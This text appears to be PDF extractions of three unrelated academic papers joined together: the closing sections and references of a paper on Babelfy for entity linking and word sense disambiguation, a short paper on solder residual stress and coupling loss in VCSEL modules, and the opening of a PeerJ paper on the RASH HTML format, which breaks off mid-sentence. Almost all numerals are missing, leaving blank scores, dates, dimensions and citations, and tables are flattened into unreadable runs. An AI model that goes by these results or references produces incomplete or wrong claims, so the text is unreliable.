ponzetto and navigli ( ). in table (first two columns), we show the results of ims and ukb on the senseval- and semeval- task datasets. we rank second on both datasets after ims. however, the differences are not statistically significant. moreover, agirre et al. ( , table ) note that using wordnet . , in- stead of . or . , to annotate these datasets can cause a more than one percent drop in performance. system f (ponzetto and navigli, ) . babelfy . uor-ssi . ukb w w . nus-pt ? . mfs . babelfy unif. weights . babelfy w/o dens. sub. . babelfy only concepts . babelfy on sentences . table : f score (percentages) on the semeval- task . the first system which has a statistically signifi- cant difference from the top system is marked with ? (χ , p < . ). entity linking. in table we show the results on the two entity linking datasets, i.e., kore and aida-conll. our system outperforms all other approaches, with kore-lsh-g getting closest, and tagme and wikifier lagging behind on the kore dataset. for the aida-conll dataset we obtain the third best performance after mw and kpcs, how- ever the difference is not statistically significant. we note the low performance of dbpedia spot- light which, even if it achieves almost % preci- sion on the identified mentions on both datasets, suf- fers from low recall due to its candidate identifica- tion step, confirming previous evaluations (derczyn- ski et al., ; hakimov et al., ; ludwig and sack, ). this problem becomes even more ac- centuated in the latest version of this system (daiber et al., ). finally, ukb using babelnet obtains low performance on el, i.e., . - . points below the state of the art. this result is discussed below. discussion. the results obtained by ukb show that the high performance of our unified approach to el and wsd is not just a mere artifact of the use of a rich multilingual semantic network, that is, ba- belnet. in other words, it is not true that any graph- based algorithm could be applied to perform both el and wsd at the same time equally well. this also shows that babelnet by itself is not sufficient for achieving high performances for both tasks and that, instead, an appropriate processing of the struc- tural and lexical information of the semantic net- work is needed. a manual analysis revealed that the main cause of error for ukb in the el setup stems system kore conll babelfy . . kore-lsh-g . . kore . ? . mw ? . . tagme . . kpcs . . kore-lsh-f . . ukb w w (on babelnet) . . illinois wikifier . . dbpedia spotlight . . babelfy unif. weights . . babelfy w/o dens. sub. . . babelfy only ne . . table : accuracy (percentages) of state-of-the-art el systems and our system on kore and aida-conll. the first system with a statistically significant difference from the top system is marked with ? (χ , p < . ). from its inability to enforce high coherence, e.g., by jointly disambiguating all the words, which is in- stead needed when considering the high level of am- biguity that we have in our semantic interpretation graph (cucerzan, ). for instance, for sentence ( ) in the introduction, ukb disambiguates thomas as a cricket player and mario as the popular video game rather than the two well-known soccer play- ers, and munich as the german city, rather than the soccer team in which they play. our approach, in- stead, by enforcing highly coherent semantic inter- pretations, correctly identifies all the soccer-related entities. in order to determine the need of our loose candi- date identification heuristic (see section ), we com- pared the percentage of times a candidate set con- tains the correct entity against that obtained by an exact string matching between the mention and the sense inventory. on kore , our heuristic retrieves the correct entity . % of the time vs. . % when exact matching is used. this demonstrates the inad- equacy of exact matching for el, and the need for a comprehensive sense inventory, as is done in our approach. we also performed different ablation tests by ex- perimenting with the following variants of our sys- tem (reported at the bottom of tables , and ): • babelfy using uniform distribution during the rwr to obtain the concepts’ semantic sig- natures; this test assesses the impact of our weighting and edge creation strategy. • babelfy without performing the densest sub- graph heuristic, i.e., when line in algorithm is g?i = gi , so as to verify the impact of identifying the most coherent interpretations. • babelfy applied to the babelnet subgraph in- duced by the entire set of named entity ver- tices, for the el task, and that induced by word senses only, for the wsd task; this test aims to stress the impact of our unified approach. • babelfy applied on sentences instead of on whole documents. the component which has a smaller impact on the performance is our triangle-based weighting scheme. the main exception is on the smallest dataset, i.e., semeval- task , for which this version attains an improvement of . percentage points. babelfy without the densest subgraph algorithm is the version which attains the lowest performances on the el task, with a % performance drop on the kore dataset, showing the need for a specially designed approach to cope with the high level of am- biguity that is encountered on this task. on the other hand, in the wsd datasets this version attains almost the same results as the full version, due to the lower number of candidate word senses. babelfy applied on sentences instead of on whole documents shows a lower performance, confirm- ing the significance of higher semantic coherence on whole documents (notwithstanding the two ex- ceptions on the semeval- task and on the semeval- german wikipedia datasets). finally, the version in which we restrict our system to named entities only (for el) and con- cepts only (for wsd) consistently obtains lower re- sults (notwithstanding the three exceptions on the spanish semeval- task using babelnet and wikipedia, and on the semeval coarse-grained task). this highlights the benefit of our joint use of lexicographic and encyclopedic structured knowl- edge, on each of the two tasks. the . % per- formance drop attained on kore is of particu- lar interest, since this dataset aims at testing perfor- mance on highly ambiguous mentions within short sentences. this indicates that the semantic analysis of small contexts can be improved by leveraging the coherence between concepts and named entities. conclusion in this paper we presented babelfy, a novel, integrated approach to entity linking and word sense disambiguation, available at http://babelfy.org. our joint solution is based on three key steps: i) the automatic creation of semantic signatures, i.e., related concepts and named entities, for each node in the reference semantic network; ii) the unconstrained identifica- tion of candidate meanings for all possible textual fragments; iii) linking based on a high-coherence densest subgraph algorithm. we used babelnet . . as our multilingual semantic network. our graph-based approach exploits the semantic network structure to its advantage: two key features of babelnet, that is, its multilinguality and its in- tegration of lexicographic and encyclopedic knowl- edge, make it possible to run our general, unified ap- proach on the two tasks of entity linking and wsd in any of the languages covered by the semantic net- work. however, we also demonstrated that babel- net in itself does not lead to state-of-the-art accu- racy on both tasks, even when used in conjunction with a high-performance graph-based algorithm like personalized pagerank. this shows the need for our novel unified approach to el and wsd. at the core of our approach lies the effective treat- ment of the high degree of ambiguity of partial tex- tual mentions by means of a -approximation algo- rithm for the densest subgraph problem, which en- ables us to output a semantic interpretation of the input text with drastically reduced ambiguity, as was previously done with ssi (navigli, ). our experiments on six gold-standard datasets show the state-of-the-art performance of our ap- proach, as well as its robustness across languages. our evaluation also demonstrates that our approach fares well both on long texts, such as those of the wsd tasks, and short and highly-ambiguous sen- tences, such as the ones in kore . finally, abla- tion tests and further analysis demonstrate that each component of our system is needed to contribute state-of-the-art performances on both el and wsd. as future work, we plan to use babelfy for in- formation extraction, where semantics is taking the lead (moro and navigli, ), and for the valida- tion of semantic annotations (vannella et al., ). acknowledgments the authors gratefully acknowl- edge the support of the erc start- ing grant multijedi no. . references eneko agirre and aitor soroa. . personalizing pagerank for word sense disambiguation. in proc. of eacl, pages – . eneko agirre, david martı́nez, oier lópez de lacalle, and aitor soroa. . two graph-based algorithms for state-of-the-art wsd. in proc. of emnlp, pages – . eneko agirre, aitor soroa, and mark stevenson. . graph-based word sense disambiguation of biomedi- cal documents. bioinformatics, ( ): – . eneko agirre, oier lopez de lacalle, and aitor soroa. . random walks for knowledge-based word sense disambiguation. computational linguistics, ( ): – . sören auer, christian bizer, georgi kobilarov, jens lehmann, richard cyganiak, and zachary ives. . dbpedia: a nucleus for a web of open data. in proc. of iswc/aswc, pages – . carmen banea and rada mihalcea. . word sense disambiguation with multilingual features. in proc. of iwcs, pages – . christoph böhm, gerard de melo, felix naumann, and gerhard weikum. . linda: distributed web-of- data-scale entity matching. in proc. of cikm, pages – . samuel brody and mirella lapata. . bayesian word sense induction. in proc. of eacl, pages – . razvan c. bunescu and marius pasca. . using en- cyclopedic knowledge for named entity disambigua- tion. in proc. of eacl, pages – . yee seng chan, hwee tou ng, and zhi zhong. . nus-pt: exploiting parallel texts for word sense disambiguation in the english all-words tasks. in proc. of semeval- , pages – . moses charikar. . greedy approximation algo- rithms for finding dense components in a graph. in proc. of approx, pages – . xiao cheng and dan roth. . relational inference for wikification. in proc. of emnlp, pages – . marco cornolti, paolo ferragina, and massimiliano cia- ramita. . a framework for benchmarking entity- annotation systems. in proc. of www, pages – . silviu cucerzan. . large-scale named entity dis- ambiguation based on wikipedia data. in proc. of emnlp-conll, pages – . joachim daiber, max jakob, chris hokamp, and pablo n. mendes. . improving efficiency and accuracy in multilingual entity extraction. in proc. of i-semantics, pages – . leon derczynski, diana maynard, niraj aswani, and kalina bontcheva. . microblog-genre noise and impact on semantic annotation accuracy. in proc. of hypertext, pages – . antonio di marco and roberto navigli. . cluster- ing and diversifying web search results with graph- based word sense induction. computational linguis- tics, ( ): – . nicolai erbs, torsten zesch, and iryna gurevych. . link discovery: a comprehensive analysis. in proc. of icsc, pages – . oren etzioni, michele banko, and michael j cafarella. . machine reading. in proc. of aaai, pages – . uriel feige, guy kortsarz, and david peleg. . the dense k-subgraph problem. algorithmica, : . christiane fellbaum. . wordnet: an electronic lexical database. mit press. paolo ferragina and ugo scaiella. . tagme: on-the-fly annotation of short text fragments (by wikipedia entities). in proc. of cikm, pages – . paolo ferragina and ugo scaiella. . fast and accu- rate annotation of short texts with wikipedia pages. ieee software, ( ): – . weiwei guo and mona t. diab. . combining orthogonal monolingual and multilingual sources of evidence for all words wsd. in proc. of acl, pages – . yoan gutiérrez, yenier castañeda, andy gonzález, rainel estrada, dennys d. piug, jose i. abreu, roger pérez, antonio fernández orquı́n, andrés montoyo, rafael muñoz, and franc camara. . umcc dlsi: reinforcing a ranking algorithm with sense frequencies and multidimensional semantic resources to solve multilingual word sense disam- biguation. in proc. of semeval- , pages – . ben hachey, will radford, joel nothman, matthew hon- nibal, and james r. curran. . evaluating en- tity linking with wikipedia. artificial intelligence, : – . sherzod hakimov, salih atilay oto, and erdogan dogdu. . named entity recognition and disambiguation using linked data and graph-based centrality scoring. in proc. of swim, pages : – : . taher h. haveliwala. . topic-sensitive pagerank. in proc. of www, pages – . johannes hoffart, mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proc. of emnlp, pages – . johannes hoffart, stephan seufert, dat ba nguyen, mar- tin theobald, and gerhard weikum. . kore: keyphrase overlap relatedness for entity disambigua- tion. in proc. of cikm, pages – . johannes hoffart, fabian m suchanek, klaus berberich, and gerhard weikum. . yago : a spatially and temporally enhanced knowledge base from wikipedia. artificial intelligence, : – . eduard h. hovy, roberto navigli, and simone p. ponzetto. . collaboratively built semi-structured content and artificial intelligence: the story so far. artificial intelligence, : – . samir khuller and barna saha. . on finding dense subgraphs. in proc. of icalp, pages – . sayali kulkarni, amit singh, ganesh ramakrishnan, and soumen chakrabarti. . collective annotation of wikipedia entities in web text. in proc. of kdd, pages – . els lefever and véronique hoste. . semeval- task : cross-lingual word sense disambiguation. in proc. of semeval- , pages – . els lefever and véronique hoste. . semeval- task : cross-lingual word sense disambiguation. in proc. of semeval- , pages – . els lefever, véronique hoste, and martine de cock. . parasense or how to use parallel corpora for word sense disambiguation. in proc. of acl-hlt, pages – . michael e. lesk. . automatic sense disambigua- tion using machine readable dictionaries: how to tell a pine cone from an ice cream cone. in proc. of the international conference on systems documen- tation, pages – . nadine ludwig and harald sack. . named entity recognition for user-generated tags. in proc. of dexa, pages – . suresh manandhar, ioannis p. klapaftis, dmitriy dli- gach, and sameer s. pradhan. . semeval- task : word sense induction & disambiguation. in proc. of semeval- , pages – . steve l. manion and raazesh sainudiin. . dae- bak!: peripheral diversity for multilingual word sense disambiguation. in proc. of semeval- , pages – . pablo n. mendes, max jakob, andrés garcı́a-silva, and christian bizer. . dbpedia spotlight: shed- ding light on the web of documents. in proc. of i- semantics, pages – . rada mihalcea and andras csomai. . wikify!: link- ing documents to encyclopedic knowledge. in proc. of cikm, pages – . rada mihalcea and dan i moldovan. . extended wordnet: progress report. in proc. of naacl work- shop on wordnet and other lexical resources, pages – . rada mihalcea. . unsupervised large-vocabulary word sense disambiguation with graph-based algo- rithms for sequence data labeling. in proc. of hlt/emnlp, pages – . george a. miller, claudia leacock, randee tengi, and ross t. bunker. . a semantic concordance. in proc. of hlt, pages – . tristan miller, chris biemann, torsten zesch, and iryna gurevych. . using distributional similarity for lexical expansion in knowledge-based word sense disambiguation. in proc. of coling, pages – . david milne and ian h. witten. . learning to link with wikipedia. in proc. of cikm, pages – . andrea moro and roberto navigli. . integrating syntactic and semantic analysis into the open infor- mation extraction paradigm. in proc. of ijcai, pages – . roberto navigli and mirella lapata. . an experi- mental study of graph connectivity for unsupervised word sense disambiguation. tpami, ( ): – . roberto navigli and simone paolo ponzetto. a. ba- belnet: the automatic construction, evaluation and application of a wide-coverage multilingual semantic network. artificial intelligence, : – . roberto navigli and simone paolo ponzetto. b. joining forces pays off: multilingual joint word sense disambiguation. in proc. of emnlp, pages – . roberto navigli, kenneth c. litkowski, and orin har- graves. . semeval- task : coarse- grained english all-words task. in proc. of semeval- , pages – . roberto navigli, david jurgens, and daniele vannella. . semeval- task : multilingual word sense disambiguation. in proc. of semeval- , pages – . roberto navigli. . a structural approach to the automatic adjudication of word sense disagreements. natural language engineering, ( ): – . roberto navigli. . word sense disambiguation: a survey. acm computing surveys, ( ): – . roberto navigli. . a quick tour of word sense disambiguation, induction and related approaches. in proc. of sofsem, pages – . hwee tou ng and hian beng lee. . integrat- ing multiple knowledge sources to disambiguate word sense: an exemplar-based approach. in proc. of acl, pages – . mohammad taher pilehvar and roberto navigli. . a large-scale pseudoword-based evaluation frame- work for state-of-the-art word sense disambigua- tion. computational linguistics. simone p. ponzetto and roberto navigli. . knowledge-rich word sense disambiguation rivaling supervised system. in proc. of acl, pages – . sameer s. pradhan, edward loper, dmitriy dligach, and martha palmer. . semeval- task : en- glish lexical sample, srl and all words. in proc. of semeval- , pages – . association for compu- tational linguistics. delip rao, paul mcnamee, and mark dredze. . en- tity linking: finding extracted entities in a knowl- edge base. in multi-source, multilingual information extraction and summarization, theory and applica- tions of natural language processing, pages – . springer berlin heidelberg. lev-arie ratinov, dan roth, doug downey, and mike anderson. . local and global algorithms for disambiguation to wikipedia. in proc. of acl, pages – . lenhart k. schubert. . turing’s dream and the knowledge challenge. in proc. of ncai, pages – . didier schwab, andon tchechmedjiev, jérôme goulian, mohammad nasiruddin, gilles sérasset, and hervé blanchon. . getalp system: propagation of a lesk measure through an ant colony algorithm. in proc. of semeval- , pages – . hui shen, razvan bunescu, and rada mihalcea. . coarse to fine grained sense disambiguation in wikipedia. in proc. of *sem, pages – . ravi sinha and rada mihalcea. . unsupervised graph-based word sense disambiguation using mea- sures of word semantic similarity. in proc. of icsc, pages – . benjamin snyder and martha palmer. . the english all-words task. in proc. of senseval- , pages – . carlo strapparava and alessandro valitutti. . word- net affect: an affective extension of wordnet. in proc. of lrec, pages – . hanghang tong, christos faloutsos, and jia-yu pan. . fast random walk with restart and its appli- cations. in proc. of icdm, pages – . kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in proc. of naacl-hlt, pages – . george tsatsaronis, michalis vazirgiannis, and ion an- droutsopoulos. . word sense disambiguation with spreading activation networks generated from thesauri. in proc. of ijcai, pages – . tim van de cruys and marianna apidianaki. . la- tent semantic word sense induction and disambigua- tion. in proc. of acl, pages – . daniele vannella, david jurgens, daniele scarfini, domenico toscani, and roberto navigli. . vali- dating and extending semantic knowledge bases us- ing video games with a purpose. in proc. of acl. duncan j. watts and steven h. strogatz. . col- lective dynamics of ’small-world’ networks. nature, ( ): – . zhi zhong and hwee tou ng. . it makes sense: a wide-coverage word sense disambiguation system for free text. in proc. of acl (demo), pages – . amal zouaq, michel gagnon, and benoit ozell. . a sumo-based semantic analysis for knowledge ex- traction. in proc of ltc. stress distribution and alignment shift analyses in the vcsel the effect of residual stress on coupling power loss of vcsel modulus jao-hwa kuang , chao-ming hsu , ah-der lin , jyun-wei luo .dept. of mech. and electro-mech. engr., national sun yat-sen univ., kuang@faculty.nsysu.edu.tw .dept. of mech. engr., national kaohsiung univ. of app. sci., jammy@cc.kuas.edu.tw .dept. of mech. engr., cheng-shiu univ.,ader@csu.edu.tw kaohsiung, taiwan abstract. in this article, the effect of residual stress on active region misalignment of laser light sources for vertical cavity surface emitting laser (vcsel) modulus has been studied. the post-weld-shift variation of active region introduced from the residual stress distribution variation for different vcsel solder joints, i.e. tin-silver (sn/ . ag) and tin-lead (sn/ pb) solder joints, are simulated by employing the thermal-elastic-plastic finite element model of marc package. the ball grid solidification in reflow process and the creep deformation in the acceleration aging were simulated and analyze. the time and temperature dependent material properties of solders are employed. numerical results indicate that the post-weld-shift introduced from residual stress in the solidification process are significant, and are also the key reasons to reduce the coupling efficiency in vcsel packaging. the non-sequential components models in commercial zemax optical package were used to estimate the optical coupling power loss between the active region and the fiber tip in vscel modulus. the results show that the proposed post-weld-shift model is feasible to analyze and to improve the solder joint design in the vcsel packaging. keywords: vcsel, fem , creep , residual stresses, misalignment. . introduction manufactured by geas, the vcsel modulus is an active opto-electronic device, and quite different from traditional laser diodes [ ]. it has a compact volume coupled with fiber by circle beam, and is made in an arrayed form for better fiber communications [ ] [ ]. the optical coupled power of a vcsel modulus depends upon residual stress distribution and the corresponding pws (post-weld shift) after the reflow process [ ]. to ensure the reliability of the vcsel modulus for temperature-fluctuating operations, the endurance tests are necessary and versatile [ ]. the notable item is the acceleration aging test. in the test, the thermal stresses dominate the vcsel modulus deformation which induces the active region misalignment for vcsel. the misalignment has a strong influence on the optical coupled power loss [ ]. basically, the vcsel modulus is classified into three parts; vcsel structure, micro-solder ball and silicon bench (substrate), as shown in figure . the dimensions of vcsel modulus are x x µm. the sizes of a vcsel structure are x x . µm. in the opto-electronic packaging, solder surface mounted technology (smt) is used to connect the components [ ]. to assemble the vcsel modulus, smt uses different solder ball joints, such as sn/ pb and sn/ . ag solders. of particular interest, the pad design is the layout for laser sources, layers mounting markers, and solder ball positioning, etc. (a) vcsel modulus (b) details of vcsel structure fig. schematic illustrations of vcsel in this study, both sn/ pb and sn/ . ag solders are simulated. the residual stresses for both solders are calculated for the reflow process and acceleration aging test. the coefficient of thermal expansion (cte) of gaas is two times as that of silicon. due to the cte difference between gaas and si, the residual stress has great influence on the yielding and misalignment of vcsel. the effect of creeping is included in the acceleration aging test. the active region misalignment induced by the residual stress will be investigated for evaluating the optical coupled power loss for vcsel. fig. finite element mesh model for vcsel modulus . finite element model for vcsel modulus surface evolver simulating the solder solidification process is used to predict the shape of solder during the reflow process. the reflowed solder shape will be reconstructed in the finite element package of msc, marc. figure shows the vcsel mesh model symmetric about yz-plane. the substrate is made of pure silicon and its sizes are x x µm. the node number is for vcsel structure, for micro-solder ball, and for substrate, respectively. the laser sources in the vcsel structure indicated by points a are located at the center of the active region, as shown in figure (b). the primary composition of vcsel structure consists of gaas, au, pt and ti. considering the creeping effects, the power of first order is included in this study[ ]. on the boundary, the nature convection coefficient for a local area was proposed by ellison [ ] based upon experimental method. table lists the experience factors of the nature convection coefficient having a value of zero on the symmetric surface. the nature convection coefficient can be written as below. h = . k (△t/l) m (w/m ‧℃) where h is the nature convention coefficient, △t the temperature difference between boundary and environment(℃), m the first experience factor, k the second experience factor, and l the characteristic length(m). furthermore, the corners of yz-plane (the symmetric plane) are fixed, and the other points of yz-plane have no displacement in the x-direction. the material of vcsel modulus follows the isotropic-hardening rule, von- mises yielding criterion, and prandtl-reuss flow rule. the optical coupled power loss of vcsel modulus is estimated by zemax using its powerful non-sequential module. the roughness of the reflection surface is close to the quality of mirror, and the maximum clear aperture is µm. each laser source diode contains layout rays and analysis rays of mw. table experience factors for convection by ellison [ ] char. plane. l k m vertical plane height . . horizontal plane (face up) a . . horizontal plane(face down) a . note: a = length×width/ ×〔( length + width )〕 t e m p e ra tu e r( o c ) time(sec) . sn/ . ag sn/ pb (a) temperature profile (b) residual stress distribution fig. reflow process for vcsel using sn/ pb solder joints. . numerical results and discussion in the simulation, the process sequence is the reflow process followed by the acceleration aging test. the temperature profile of the reflow process is shown in figure (a). the time period for a vcsel modulus is minutes in the reflow process. according to bellcore standard ta-tsa- , the acceleration aging test in this study has a temperature of ℃ maintained for hours. the residual stress distribution is then calculated and the corresponding displacement of vcsel modulus is then estimated. the mechanic-thermal coupled field is adopted in the numerical analysis. the joints of vcsel structure use sn/ pb or sn/ . ag solder ball. the solder ball joint has a significant effect on the misalignment of the active region in view of deformation induced by the residual stresses. figure (b) presents the residual stress distribution of sn/ pb solder joints used by the vcsel modulus for the reflow process. after the reflow process, the maximum von mises stresses is mpa and its position is marked by point p. it is found that point p is located at the interface between the solder joint and the pad, as shown in figure (b). as shown in figure , the stress variation of point p is calculated for the reflow process and the acceleration aging test which follows the reflow process. it is observed that the stress of point p is close to zero at the melting point of sn/ pb solder. in the solidification stage, the stress of point p rises up and finally come to a fixed value, the residual stress of point p. similarly, the residual stress is . mpa for sn/ . ag solder joint. according to figure (b), the stress relaxing caused by creeping is obvious. v o n -m is e s s tr e s s (m p a ) time(sec) temperatuer von-mises stress p ru n c ip a l s tr e s s m a jo r ( m p a ) time(hr) (a) reflow process (b) acceleration aging test fig. stress variation of the point p for sn/ pb solder joints. t e m p e ra tu re (o c ) d is p la c e m e n t(  m ) time(sec) temperature displacment d is p la c e m e n t x ( m ) time(sec) . . (a) reflow process (b) acceleration aging test fig. displacement of point a of vcsel using sn/ pb solder joints (a) simulation model (b) power distribution fig. simulation of zemax as shown in figure , the optical coupled power loss is simulated by zemax. the fiber material is bk , µm diameter and µm length. the core material is sf with µm diameter and µm long. in industry, the initial alignment of the vcsel structure and fiber is set to have the greatest power transmitting efficiency. then followed by the reflow process, the vcsel structure and fiber are jointed. generally, the optical coupled power loss will increase for each process or test. according to the numerical simulation, the center of the active region, point a, has the greatest pws. the displacement and the corresponding optical coupled power loss are listed in table . according to the table, the displacement changes from . µm to . µm for the sn/ pb solder joints, and from . µm to . µm for the sn/ . ag. however, the optical coupled power loss increases from . % to % for the sn/ pb solder, and . % to % for the sn/ . ag solder. table. active region displacement (µm)/ optical coupled power loss for different solder ball grid array joints solder materials sn/ pb sn/ . ag reflow process only . / . % . / . % reflow process +aging test . / % . / % . conclusions in this study, the residual stress distribution and the deformation for sn/ pb and sn/ . ag ball grid array of vcsel were investigated. the corresponding optical coupled power loss was estimated by the displacement from the finite element analysis. the simulated results reveal that both the post-solder-shift and the creep deformation may affect the coupling efficiency significantly. however, due to the high melting point, the sn/ . ag ball grid array joint always provide the better coupling efficiency than the sn/ pb joint during the acceleration aging test. references [ ] melanie ott, harry shaw, september , ,” evaluation of vertical cavity emitting lasers (vcsel) mounted on diamond substrates,” nasa/gsfc component technology and radiation effects branch. [ ] h. roscher and r. michalzik, "low thermal resistance flip-chip bonding of nm -d vcsel arrays capable of gbit/s/ch operation", in proc. ieee lasers and electro-opt. soc. ann. meet., leos , vol. , pp. − . tucson, az, usa, oct. [ ] r. michalzik, r. king, r. jäger, s. müller, and k.j. ebeling, "vcsel arrays for cmos integrated optical interconnect systems" (invited), in optoelectronic and wireless data management, processing, storage, and retrieval, r. raymond, p.k. srimani, r. su, and c.w. wilmsen (eds.), proc. spie , pp. − , . [ ] anderson, t. ,guven, i., madenci, e., and gustafsson, g, , “the necessity of reexamining previous life prediction analysis of solder joints in electronic packages,” ieee, pp. - . [ ] pardeep k. b., klaus g., kwang, a. y., and ahmer r. s., , “three-dimensional creep analysis of solder joints in surface mount devices,” transactions of the asme, vol. pp. - . [ ] amagai, m., , “characterization of chip scale packaging materials,” microelectronics reliability, vol. , pp. - . [ ] zarrow, p., , soldering, smt ,pp. - . [ ] lau, j. h. and pao , y. h., , solder joint reliability of bga, csp, flip chip, and fine pitch smt assemblies, mcgraw-hill, new york, usa. [ ] ellison, gordon n., thermal computations for electronic equipment, robert e. krieger publishing co., malabar, florida, . submitted october accepted august published october corresponding author silvio peroni, silvio.peroni@unibo.it academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright peroni et al. distributed under creative commons cc-by . open access research articles in simplified html: a web-first format for html-based scholarly articles silvio peroni , francesco osborne , angelo di iorio , andrea giovanni nuzzolese , francesco poggi , fabio vitali and enrico motta digital and semantic publishing laboratory, department of computer science and engineering, university of bologna, bologna, italy knowledge media institute, open university, milton keynes, united kingdom semantic technologies laboratory, institute of cognitive sciences and technologies, italian national research council, rome, italy abstract purpose. this paper introduces the research articles in simplified html (or rash), which is a web-first format for writing html-based scholarly papers; it is accompanied by the rash framework, a set of tools for interacting with rash-based articles. the paper also presents an evaluation that involved authors and reviewers of rash articles submitted to the save-sd and save-sd workshops. design. rash has been developed aiming to: be easy to learn and use; share scholarly documents (and embedded semantic annotations) through the web; support its adoption within the existing publishing workflow. findings. the evaluation study confirmed that rash is ready to be adopted in workshops, conferences, and journals and can be quickly learnt by researchers who are familiar with html. research limitations. the evaluation study also highlighted some issues in the adoption of rash, and in general of html formats, especially by less technically savvy users. moreover, additional tools are needed, e.g., for enabling additional conversions from/to existing formats such as openxml. practical implications. rash (and its framework) is another step towards enabling the definition of formal representations of the meaning of the content of an article, facilitating its automatic discovery, enabling its linking to semantically related articles, providing access to data within the article in actionable form, and allowing integration of data between papers. social implications. rash addresses the intrinsic needs related to the various users of a scholarly article: researchers (focussing on its content), readers (experiencing new ways for browsing it), citizen scientists (reusing available data formally defined within it through semantic annotations), publishers (using the advantages of new technologies as envisioned by the semantic publishing movement). value. rash helps authors to focus on the organisation of their texts, supports them in the task of semantically enriching the content of articles, and leaves all the issues about validation, visualisation, conversion, and semantic data extraction to the various tools developed within its framework. how to cite this article peroni et al. ( ), research articles in simplified html: a web-first format for html-based scholarly arti- cles. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:silvio.peroni@unibo.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. subjects digital libraries, world wide web and web science keywords document conversion, xslt, rash, semantic publishing, digital publishing, semantic web introduction in the last months of , several posts within technical mailing lists of the web (https://lists.w .org/archives/public/public-lod/ nov/ .html) and semantic web (https://lists.w .org/archives/public/public-lod/ oct/ .html) community have discussedan evergreentopic inscholarly communication, i.e.,how couldauthorsof research papers submit their works in html rather than, say, pdf, ms word or latex. besides the obvious justification of simplification and unification of data formats for drafting, submission and publication, an additional underlying rationale is that the adoption of html would ease the embedding of semantic annotations, thus improving research communications thanks to already existing w c standards such as rdfa (sporny, ), turtle (prud’hommeaux & carothers, ) and json-ld (sporny, kellogg & lanthaler, ). this opens complex and exciting scenarios that the semantic publishing community has promised us in terms of increased discoverability, interactivity, openness and usability of the scientific works (bourne et al., ; shotton et al., ). nonetheless, html is still primarily used as an output format only: the authors write their papers in latex or ms word and submit sources to the typesetters, who are responsible for producing the final version, that eventually will be published and read on the web. appropriate tools in the publishing toolchain are used to convert papers among multiple formats. the interest in web-first research papers—that are natively designed, stored and transferred in html—is increasing. just to cite a few research efforts: scholarly html (http://scholarlyhtml.org) defines a set of descriptive rules for adopting a defined subset of html to describe the metadata and content of scholarly articles; dokieli (http://dokie.li) is a web application that allows authors to create html-based scholarly articles directly on the browser, adding annotations and many other sophisticated features. this paper introduces a novel approach towards the same goal: providing authors with a subset of html for web-first papers. the format is called rash, research articles in sim- plified html, and consists of html elements only. this format is also accompanied by the rash framework, a set of specifications and tools for rash documents (peroni, ). there are two key differences between rash and other similar proposals. first of all, rash adopts a simplified pattern-based data model. the number of markup elements to be used by authors was reduced down to the bare minimum, and the elements themselves were chosen in order to minimize the cognitive effort of authors when writing documents. secondly, rash does not come with a full authoring environment but is expected to be produced from ms word, odt and latex sources. the basic idea is to allow authors to keep using the word processors on which they routinely write their papers and to peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://lists.w .org/archives/public/public-lod/ nov/ .html https://lists.w .org/archives/public/public-lod/ oct/ .html http://scholarlyhtml.org http://dokie.li http://dx.doi.org/ . /peerj-cs. provide them with multi-format converters. these converters are included in the rash framework, whose architecture is modular and extensible for handling new formats in the future. rash is in fact intended to help authors in focussing on the organisation of their texts and supports them in the task of semantically enriching the content of articles, delegating all the issues about validation/presentation/conversion of rash documents to the various tools developed within its framework. this is a well-known principle in scientific publishing, even if not yet fully applied: clear separation of concerns. the authors should focus on organising the content and structure only, and the format should not require authors to worry about how the content will be presented on screen and in print. the publishers will then take care of creating the final formatting to best render the content in the style of their publications, or authors could use self-publishing platforms as promoted by linked research (http://linkedresearch.org). such a separation of concerns can be pushed much forward. pettifer et al. ( ) explained well the difference between an article as ‘‘an instance of scholarly thought’’ and ‘‘a representation for consumption by human or machine’’, and showed how multiple representations can be combined, integrated with external data, enhanced and interacted with in order to provide scholars with sophisticated tools directly within their articles. another critical requirement for any html-based language used for scientific writing is good rendering and acceptance by the publishers. any new html-based format should be beneficial for publishers as well. of course, publishers, conferences, and workshop organisers, would like to manage new formats in the same way as for the formats they already support, such as latex. to this end, these formats should support tools for their conversion and for rendering the content in specific layouts, such as acm icps (http://www.acm.org/sigs/publications/proceedings-templates) and springer lncs (http://www.springer.com/computer/lncs?sgwid= - - - - ). rash adopts a pragmatic approach to this issue: while we are interested in a full-fledged native rash authoring environment, we implemented a set of converters, in the rash framework, that are easily integrable (and were integrated) with existing publishing platforms. the goal of this paper is, in fact, to describe the outcomes of some experimentations on the use of rash, so as to understand: . if it can be adopted as html-based submission format in academic venues (workshops, conferences, journals); . if it is easy to learn and use; . if it can be used to add semantic annotations and what are the most widely adopted vocabularies in rash papers. the rest of the paper is structured as follows. in ‘related works’ we introduce some of the most relevant related works in the area, providing a functional comparison of the various works. in ‘which ‘‘web-first’’ format for research articles?’ we introduce the rationale for the creation of a new web-first format for scholarly publications, discussing the importance of minimality. in ‘writing scholarly articles in html with rash’ and ‘the rash framework’ we introduce the theoretical background of rash, and then provide an introduction to the language and the main tools included in its framework. in ‘rash peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://linkedresearch.org http://www.acm.org/sigs/publications/proceedings-templates http://www.springer.com/computer/lncs?sgwid= - - - - http://dx.doi.org/ . /peerj-cs. and save-sd: an evaluation’ we present, as a case study, an analysis of the adoption of rash at the save-sd (http://cs.unibo.it/save-sd/ /index.html) and save-sd (http://cs.unibo.it/save-sd/ /index.html) workshops. finally, in ‘conclusions’ we conclude the paper by sketching out some future developments. related works the growing interest in the publication of web-first research papers has resulted in the release of some interesting projects related to rash. in the following subsections, we discuss all the most important contributions in this area by splitting them into two main categories: (i) html-based formats and (ii) wysiwyg editors for html documents. note that we do not discuss in detail some other efforts that have recently been done by means of non-html languages, even if they are equally relevant for the community. scholarlymarkdown (http://scholarlymarkdown.com/) (lin & beales, ), for 